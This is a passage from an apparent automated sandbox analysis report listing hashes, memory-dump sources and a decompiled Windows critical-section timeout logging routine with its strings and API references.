                                            • Opcode Fuzzy Hash: 7b067157c4b1befe7b964e855f2b5e1d7997c006cbf5f83aa6340530457a6de1
                                            • Instruction Fuzzy Hash: 39B09B729015D9C9D611E760470872B7D4477D0745F16C551D1020645B4778C091F5B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 0395FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E0395FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0390CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03955720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03955720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                            0x0395fdda
                                            0x0395fde2
                                            0x0395fde5
                                            0x0395fdec
                                            0x0395fdfa
                                            0x0395fdff
                                            0x0395fe0a
                                            0x0395fe0f
                                            0x0395fe17
                                            0x0395fe1e
                                            0x0395fe19
                                            0x0395fe19
                                            0x0395fe19
                                            0x0395fe20
                                            0x0395fe21
                                            0x0395fe22
                                            0x0395fe25
                                            0x0395fe40

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0395FDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0395FE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0395FE2B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.916473918.00000000038A0000.00000040.00000001.sdmp, Offset: 038A0000, based on PE: true
                                            • Associated: 00000008.00000002.916644471.00000000039BB000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: 1ab41d8ad29b943d4a6bb5a4b79a1880aa5f3b27e600ad56f556642038707797
                                            • Instruction ID: f4edf63d201b77ff054a28884a8ca6edd968b932f0c6801af8a7415f1edb26c1
                                            • Opcode Fuzzy Hash: 1ab41d8ad29b943d4a6bb5a4b79a1880aa5f3b27e600ad56f556642038707797
                                            • Instruction Fuzzy Hash: 51F0FC36140201BFD6209A45DC01F63BF6ADB85730F150714FA255A2D1DA62F860C7F0
                                            Uniqueness

                                            Uniqueness Score: -1.00%